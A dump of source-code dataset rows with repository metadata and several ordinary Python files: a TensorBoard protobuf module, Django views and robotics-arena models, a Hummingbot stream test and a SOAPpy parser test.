] | 353 | 2020-12-10T10:47:17.000Z | 2022-03-31T23:08:29.000Z | venv/Lib/site-packages/tensorboard/uploader/proto/server_info_pb2.py | masterrey/SmartMachines | e48aff314b1171a13a39c3a41230d900bf090a1f | [
"Apache-2.0"
] | 80 | 2020-12-10T09:54:22.000Z | 2022-03-30T22:08:45.000Z | venv/Lib/site-packages/tensorboard/uploader/proto/server_info_pb2.py | masterrey/SmartMachines | e48aff314b1171a13a39c3a41230d900bf090a1f | [
"Apache-2.0"
] | 63 | 2020-12-10T17:10:34.000Z | 2022-03-28T16:27:07.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorboard/uploader/proto/server_info.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorboard/uploader/proto/server_info.proto',
package='tensorboard.service',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n,tensorboard/uploader/proto/server_info.proto\x12\x13tensorboard.service\"l\n\x11ServerInfoRequest\x12\x0f\n\x07version\x18\x01 \x01(\t\x12\x46\n\x14plugin_specification\x18\x02 \x01(\x0b\x32(.tensorboard.service.PluginSpecification\"\xb7\x02\n\x12ServerInfoResponse\x12\x39\n\rcompatibility\x18\x01 \x01(\x0b\x32\".tensorboard.service.Compatibility\x12\x32\n\napi_server\x18\x02 \x01(\x0b\x32\x1e.tensorboard.service.ApiServer\x12<\n\nurl_format\x18\x03 \x01(\x0b\x32(.tensorboard.service.ExperimentUrlFormat\x12:\n\x0eplugin_control\x18\x04 \x01(\x0b\x32\".tensorboard.service.PluginControl\x12\x38\n\rupload_limits\x18\x05 \x01(\x0b\x32!.tensorboard.service.UploadLimits\"\\\n\rCompatibility\x12:\n\x07verdict\x18\x01 \x01(\x0e\x32).tensorboard.service.CompatibilityVerdict\x12\x0f\n\x07\x64\x65tails\x18\x02 \x01(\t\"\x1d\n\tApiServer\x12\x10\n\x08\x65ndpoint\x18\x01 \x01(\t\"?\n\x13\x45xperimentUrlFormat\x12\x10\n\x08template\x18\x01 \x01(\t\x12\x16\n\x0eid_placeholder\x18\x02 \x01(\t\"-\n\x13PluginSpecification\x12\x16\n\x0eupload_plugins\x18\x02 \x03(\t\"(\n\rPluginControl\x12\x17\n\x0f\x61llowed_plugins\x18\x01 \x03(\t\"\x92\x02\n\x0cUploadLimits\x12\x1f\n\x17max_scalar_request_size\x18\x03 \x01(\x03\x12\x1f\n\x17max_tensor_request_size\x18\x04 \x01(\x03\x12\x1d\n\x15max_blob_request_size\x18\x05 \x01(\x03\x12#\n\x1bmin_scalar_request_interval\x18\x06 \x01(\x03\x12#\n\x1bmin_tensor_request_interval\x18\x07 \x01(\x03\x12!\n\x19min_blob_request_interval\x18\x08 \x01(\x03\x12\x15\n\rmax_blob_size\x18\x01 \x01(\x03\x12\x1d\n\x15max_tensor_point_size\x18\x02 \x01(\x03*`\n\x14\x43ompatibilityVerdict\x12\x13\n\x0fVERDICT_UNKNOWN\x10\x00\x12\x0e\n\nVERDICT_OK\x10\x01\x12\x10\n\x0cVERDICT_WARN\x10\x02\x12\x11\n\rVERDICT_ERROR\x10\x03\x62\x06proto3')
)
_COMPATIBILITYVERDICT = _descriptor.EnumDescriptor(
name='CompatibilityVerdict',
full_name='tensorboard.service.CompatibilityVerdict',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='VERDICT_UNKNOWN', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VERDICT_OK', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VERDICT_WARN', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VERDICT_ERROR', index=3, number=3,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=1049,
serialized_end=1145,
)
_sym_db.RegisterEnumDescriptor(_COMPATIBILITYVERDICT)
CompatibilityVerdict = enum_type_wrapper.EnumTypeWrapper(_COMPATIBILITYVERDICT)
VERDICT_UNKNOWN = 0
VERDICT_OK = 1
VERDICT_WARN = 2
VERDICT_ERROR = 3
_SERVERINFOREQUEST = _descriptor.Descriptor(
name='ServerInfoRequest',
full_name='tensorboard.service.ServerInfoRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='version', full_name='tensorboard.service.ServerInfoRequest.version', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='plugin_specification', full_name='tensorboard.service.ServerInfoRequest.plugin_specification', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=69,
serialized_end=177,
)
_SERVERINFORESPONSE = _descriptor.Descriptor(
name='ServerInfoResponse',
full_name='tensorboard.service.ServerInfoResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='compatibility', full_name='tensorboard.service.ServerInfoResponse.compatibility', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='api_server', full_name='tensorboard.service.ServerInfoResponse.api_server', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url_format', full_name='tensorboard.service.ServerInfoResponse.url_format', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='plugin_control', full_name='tensorboard.service.ServerInfoResponse.plugin_control', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='upload_limits', full_name='tensorboard.service.ServerInfoResponse.upload_limits', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=180,
serialized_end=491,
)
_COMPATIBILITY = _descriptor.Descriptor(
name='Compatibility',
full_name='tensorboard.service.Compatibility',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='verdict', full_name='tensorboard.service.Compatibility.verdict', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='details', full_name='tensorboard.service.Compatibility.details', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=493,
serialized_end=585,
)
_APISERVER = _descriptor.Descriptor(
name='ApiServer',
full_name='tensorboard.service.ApiServer',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='endpoint', full_name='tensorboard.service.ApiServer.endpoint', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=587,
serialized_end=616,
)
_EXPERIMENTURLFORMAT = _descriptor.Descriptor(
name='ExperimentUrlFormat',
full_name='tensorboard.service.ExperimentUrlFormat',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='template', full_name='tensorboard.service.ExperimentUrlFormat.template', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id_placeholder', full_name='tensorboard.service.ExperimentUrlFormat.id_placeholder', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=618,
serialized_end=681,
)
_PLUGINSPECIFICATION = _descriptor.Descriptor(
name='PluginSpecification',
full_name='tensorboard.service.PluginSpecification',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='upload_plugins', full_name='tensorboard.service.PluginSpecification.upload_plugins', index=0,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=683,
serialized_end=728,
)
_PLUGINCONTROL = _descriptor.Descriptor(
name='PluginControl',
full_name='tensorboard.service.PluginControl',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='allowed_plugins', full_name='tensorboard.service.PluginControl.allowed_plugins', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=730,
serialized_end=770,
)
_UPLOADLIMITS = _descriptor.Descriptor(
name='UploadLimits',
full_name='tensorboard.service.UploadLimits',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='max_scalar_request_size', full_name='tensorboard.service.UploadLimits.max_scalar_request_size', index=0,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_tensor_request_size', full_name='tensorboard.service.UploadLimits.max_tensor_request_size', index=1,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_blob_request_size', full_name='tensorboard.service.UploadLimits.max_blob_request_size', index=2,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='min_scalar_request_interval', full_name='tensorboard.service.UploadLimits.min_scalar_request_interval', index=3,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='min_tensor_request_interval', full_name='tensorboard.service.UploadLimits.min_tensor_request_interval', index=4,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='min_blob_request_interval', full_name='tensorboard.service.UploadLimits.min_blob_request_interval', index=5,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_blob_size', full_name='tensorboard.service.UploadLimits.max_blob_size', index=6,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_tensor_point_size', full_name='tensorboard.service.UploadLimits.max_tensor_point_size', index=7,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=773,
serialized_end=1047,
)
_SERVERINFOREQUEST.fields_by_name['plugin_specification'].message_type = _PLUGINSPECIFICATION
_SERVERINFORESPONSE.fields_by_name['compatibility'].message_type = _COMPATIBILITY
_SERVERINFORESPONSE.fields_by_name['api_server'].message_type = _APISERVER
_SERVERINFORESPONSE.fields_by_name['url_format'].message_type = _EXPERIMENTURLFORMAT
_SERVERINFORESPONSE.fields_by_name['plugin_control'].message_type = _PLUGINCONTROL
_SERVERINFORESPONSE.fields_by_name['upload_limits'].message_type = _UPLOADLIMITS
_COMPATIBILITY.fields_by_name['verdict'].enum_type = _COMPATIBILITYVERDICT
DESCRIPTOR.message_types_by_name['ServerInfoRequest'] = _SERVERINFOREQUEST
DESCRIPTOR.message_types_by_name['ServerInfoResponse'] = _SERVERINFORESPONSE
DESCRIPTOR.message_types_by_name['Compatibility'] = _COMPATIBILITY
DESCRIPTOR.message_types_by_name['ApiServer'] = _APISERVER
DESCRIPTOR.message_types_by_name['ExperimentUrlFormat'] = _EXPERIMENTURLFORMAT
DESCRIPTOR.message_types_by_name['PluginSpecification'] = _PLUGINSPECIFICATION
DESCRIPTOR.message_types_by_name['PluginControl'] = _PLUGINCONTROL
DESCRIPTOR.message_types_by_name['UploadLimits'] = _UPLOADLIMITS
DESCRIPTOR.enum_types_by_name['CompatibilityVerdict'] = _COMPATIBILITYVERDICT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ServerInfoRequest = _reflection.GeneratedProtocolMessageType('ServerInfoRequest', (_message.Message,), {
'DESCRIPTOR' : _SERVERINFOREQUEST,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ServerInfoRequest)
})
_sym_db.RegisterMessage(ServerInfoRequest)
ServerInfoResponse = _reflection.GeneratedProtocolMessageType('ServerInfoResponse', (_message.Message,), {
'DESCRIPTOR' : _SERVERINFORESPONSE,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ServerInfoResponse)
})
_sym_db.RegisterMessage(ServerInfoResponse)
Compatibility = _reflection.GeneratedProtocolMessageType('Compatibility', (_message.Message,), {
'DESCRIPTOR' : _COMPATIBILITY,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.Compatibility)
})
_sym_db.RegisterMessage(Compatibility)
ApiServer = _reflection.GeneratedProtocolMessageType('ApiServer', (_message.Message,), {
'DESCRIPTOR' : _APISERVER,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ApiServer)
})
_sym_db.RegisterMessage(ApiServer)
ExperimentUrlFormat = _reflection.GeneratedProtocolMessageType('ExperimentUrlFormat', (_message.Message,), {
'DESCRIPTOR' : _EXPERIMENTURLFORMAT,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.ExperimentUrlFormat)
})
_sym_db.RegisterMessage(ExperimentUrlFormat)
PluginSpecification = _reflection.GeneratedProtocolMessageType('PluginSpecification', (_message.Message,), {
'DESCRIPTOR' : _PLUGINSPECIFICATION,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.PluginSpecification)
})
_sym_db.RegisterMessage(PluginSpecification)
PluginControl = _reflection.GeneratedProtocolMessageType('PluginControl', (_message.Message,), {
'DESCRIPTOR' : _PLUGINCONTROL,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.PluginControl)
})
_sym_db.RegisterMessage(PluginControl)
UploadLimits = _reflection.GeneratedProtocolMessageType('UploadLimits', (_message.Message,), {
'DESCRIPTOR' : _UPLOADLIMITS,
'__module__' : 'tensorboard.uploader.proto.server_info_pb2'
# @@protoc_insertion_point(class_scope:tensorboard.service.UploadLimits)
})
_sym_db.RegisterMessage(UploadLimits)
# @@protoc_insertion_point(module_scope)
| 40.127572 | 1,788 | 0.762383 | 2,310 | 19,502 | 6.133766 | 0.099134 | 0.044604 | 0.053356 | 0.056885 | 0.624674 | 0.526007 | 0.509281 | 0.509281 | 0.478157 | 0.463547 | 0 | 0.032963 | 0.117988 | 19,502 | 485 | 1,789 | 40.210309 | 0.790768 | 0.040816 | 0 | 0.642202 | 1 | 0.002294 | 0.253263 | 0.199979 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013761 | 0 | 0.013761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0e677bb51b35c500b63970611b9dbe8b1db2dde6 | 292 | py | Python | django2/demo/meeting/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | django2/demo/meeting/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | 1 | 2020-07-17T09:25:42.000Z | 2020-07-17T09:25:42.000Z | django2/demo/meeting/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def hello(request):
return HttpResponse("Hello world")
def date(request, year, month, day):
return HttpResponse({
year: year,
month: month,
day: day
})
| 17.176471 | 38 | 0.660959 | 35 | 292 | 5.514286 | 0.571429 | 0.103627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 292 | 16 | 39 | 18.25 | 0.881279 | 0.078767 | 0 | 0 | 0 | 0 | 0.041199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
0e7dc78c76ad3448f8b2889d760c4e349ce77e58 | 1,429 | py | Python | test/connector/exchange/altmarkets/test_altmarkets_user_stream_tracker.py | BGTCapital/hummingbot | 2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242 | [
"Apache-2.0"
] | 542 | 2021-12-17T22:34:31.000Z | 2022-03-31T14:36:23.000Z | test/connector/exchange/altmarkets/test_altmarkets_user_stream_tracker.py | BGTCapital/hummingbot | 2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242 | [
"Apache-2.0"
] | 291 | 2021-12-17T20:07:53.000Z | 2022-03-31T11:07:23.000Z | test/connector/exchange/altmarkets/test_altmarkets_user_stream_tracker.py | BGTCapital/hummingbot | 2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242 | [
"Apache-2.0"
] | 220 | 2021-12-17T12:41:23.000Z | 2022-03-31T23:03:22.000Z | #!/usr/bin/env python
import sys
import asyncio
import logging
import unittest
import conf
from os.path import join, realpath
from hummingbot.connector.exchange.altmarkets.altmarkets_user_stream_tracker import AltmarketsUserStreamTracker
from hummingbot.connector.exchange.altmarkets.altmarkets_auth import AltmarketsAuth
from hummingbot.core.utils.async_utils import safe_ensure_future
from hummingbot.logger.struct_logger import METRICS_LOG_LEVEL
sys.path.insert(0, realpath(join(__file__, "../../../../../")))
logging.basicConfig(level=METRICS_LOG_LEVEL)
class AltmarketsUserStreamTrackerUnitTest(unittest.TestCase):
api_key = conf.altmarkets_api_key
api_secret = conf.altmarkets_secret_key
@classmethod
def setUpClass(cls):
cls.ev_loop: asyncio.BaseEventLoop = asyncio.get_event_loop()
cls.trading_pairs = ["BTC-USD"]
cls.user_stream_tracker: AltmarketsUserStreamTracker = AltmarketsUserStreamTracker(
altmarkets_auth=AltmarketsAuth(cls.api_key, cls.api_secret),
trading_pairs=cls.trading_pairs)
cls.user_stream_tracker_task: asyncio.Task = safe_ensure_future(cls.user_stream_tracker.start())
def test_user_stream(self):
# Wait process some msgs.
print("\nSleeping for 30s to gather some user stream messages.")
self.ev_loop.run_until_complete(asyncio.sleep(30.0))
print(self.user_stream_tracker.user_stream)
| 37.605263 | 111 | 0.773268 | 177 | 1,429 | 5.971751 | 0.446328 | 0.075686 | 0.080416 | 0.056764 | 0.0965 | 0.0965 | 0 | 0 | 0 | 0 | 0 | 0.004882 | 0.139958 | 1,429 | 37 | 112 | 38.621622 | 0.855167 | 0.030791 | 0 | 0 | 0 | 0 | 0.055676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.37037 | 0 | 0.555556 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0e88cbb20b73b185549520afd3dddebdd1c5d349 | 881 | py | Python | tests/Bug1161780.py | grangier/python-soappy | 41158e4afabe3af2ff414b1c4be35907bbf5dc81 | [
"BSD-3-Clause"
] | 1 | 2015-01-19T02:11:57.000Z | 2015-01-19T02:11:57.000Z | tests/Bug1161780.py | grangier/python-soappy | 41158e4afabe3af2ff414b1c4be35907bbf5dc81 | [
"BSD-3-Clause"
] | 2 | 2017-02-03T20:11:57.000Z | 2019-09-09T19:10:49.000Z | tests/Bug1161780.py | grangier/python-soappy | 41158e4afabe3af2ff414b1c4be35907bbf5dc81 | [
"BSD-3-Clause"
] | 3 | 2016-04-22T17:38:29.000Z | 2019-08-13T14:38:37.000Z | #!/usr/bin/env python
import sys
sys.path.insert(1, "..")
from SOAPpy.Errors import Error
from SOAPpy.Parser import parseSOAPRPC
original = """<?xml version="1.0"?>
<SOAP-ENV:Envelope
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<doSingleRecord SOAP-ENC:root="1">
</doSingleRecord>
</SOAP-ENV:Body>
<ErrorString>The CustomerID tag could not be found or the number contained in the tag was invalid</ErrorString></SOAP-ENV:Envelope>
"""
try:
parseSOAPRPC(original, attrs = 1)
except Error, e:
if e.msg != "expected nothing, got `ErrorString'":
raise AssertionError, "Incorrect error message generated: " + e.msg
else:
raise AssertionError, "Incorrect error message generated"
print "Success"
| 30.37931 | 132 | 0.725312 | 120 | 881 | 5.325 | 0.525 | 0.065728 | 0.084507 | 0.098592 | 0.323944 | 0.28482 | 0.131455 | 0.131455 | 0 | 0 | 0 | 0.006494 | 0.125993 | 881 | 28 | 133 | 31.464286 | 0.823377 | 0.022701 | 0 | 0 | 0 | 0.043478 | 0.660465 | 0.047674 | 0 | 0 | 0 | 0 | 0.086957 | 0 | null | null | 0 | 0.130435 | null | null | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0e97bd1c773c1a5622d071293cbf5def12d114a3 | 3,101 | py | Python | api/models.py | WalkingMachine/wonderland | 44e27ccdd981c6e6d2a8e7944156a8bc9e730931 | [
"Apache-2.0"
] | 3 | 2017-06-10T15:49:47.000Z | 2019-03-15T10:04:31.000Z | api/models.py | WalkingMachine/wonderland | 44e27ccdd981c6e6d2a8e7944156a8bc9e730931 | [
"Apache-2.0"
] | 11 | 2017-06-05T20:19:32.000Z | 2018-06-16T21:03:37.000Z | api/models.py | WalkingMachine/wonderland | 44e27ccdd981c6e6d2a8e7944156a8bc9e730931 | [
"Apache-2.0"
] | 2 | 2017-07-17T18:03:45.000Z | 2021-11-12T03:36:58.000Z | from django.db import models
# Description of an object in the arena
class Entity(models.Model):
entityId = models.AutoField(primary_key=True)
entityClass = models.CharField(max_length=30)
entityName = models.CharField(max_length=30, null=True, blank=True)
entityCategory = models.CharField(max_length=30, null=True, blank=True)
entityColor = models.CharField(max_length=30, null=True, blank=True)
entityWeight = models.FloatField(default=None, null=True, blank=True)
entitySize = models.FloatField(default=None, null=True, blank=True)
entityIsRoom = models.BooleanField(default=False, blank=True)
entityIsWaypoint = models.BooleanField(default=False, blank=True)
entityIsContainer = models.BooleanField(default=False, blank=True)
entityGotPosition = models.BooleanField(default=False, blank=True)
# The position of the object in space if available
entityPosX = models.FloatField(default=None, null=True, blank=True)
entityPosY = models.FloatField(default=None, null=True, blank=True)
entityPosZ = models.FloatField(default=None, null=True, blank=True)
entityPosYaw = models.FloatField(default=None, null=True, blank=True)
entityPosPitch = models.FloatField(default=None, null=True, blank=True)
entityPosRoll = models.FloatField(default=None, null=True, blank=True)
# The position to reach to be able to catch the object
entityWaypointX = models.FloatField(default=None, null=True, blank=True)
entityWaypointY = models.FloatField(default=None, null=True, blank=True)
entityWaypointYaw = models.FloatField(default=None, null=True, blank=True)
# Just for serializer
depth_waypoint = models.IntegerField(null=True, blank=True)
depth_position = models.IntegerField(null=True, blank=True)
entityContainer = models.ForeignKey('self', on_delete=models.SET_NULL, null=True, blank=True)
def __str__(self):
return self.entityClass + " - " + str(self.entityId)
# Description of an object in the arena
class People(models.Model):
peopleId = models.AutoField(primary_key=True)
peopleRecognitionId = models.IntegerField(null=True, blank=True, unique=True)
peopleName = models.CharField(max_length=30, null=True, blank=True)
peopleAge = models.IntegerField(null=True, blank=True)
peopleColor = models.CharField(max_length=30, null=True, blank=True)
peoplePose = models.CharField(max_length=30, null=True, blank=True)
peoplePoseAccuracy = models.FloatField(default=None, null=True, blank=True)
peopleEmotion = models.CharField(max_length=30, null=True, blank=True)
peopleEmotionAccuracy = models.FloatField(default=None, null=True, blank=True)
peopleGender = models.CharField(max_length=10, null=True, blank=True)
peopleGenderAccuracy = models.FloatField(default=None, null=True, blank=True)
peopleIsOperator = models.BooleanField(default=False)
def __str__(self):
return str(self.peopleId) + "(" + str(
self.peopleRecognitionId) + ") - " + self.peopleGender + " - " + self.peopleColor + " - " + self.peoplePose
| 46.984848 | 119 | 0.741696 | 377 | 3,101 | 6.039788 | 0.236074 | 0.12253 | 0.15415 | 0.201581 | 0.60123 | 0.564339 | 0.434343 | 0.434343 | 0.132191 | 0 | 0 | 0.006798 | 0.146082 | 3,101 | 65 | 120 | 47.707692 | 0.853097 | 0.063528 | 0 | 0.046512 | 0 | 0 | 0.006211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.023256 | 0.046512 | 0.976744 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0ea75c30072eee31077e1649933e02a8c3a47e21 | 2,617 | py | Python | meiduo_mall/scripts/regenerate_detail_html.py | 1103928458/meiduo_drf | 49595755f264b09ea748b4deb8a88bba5eb8557b | [
"MIT"
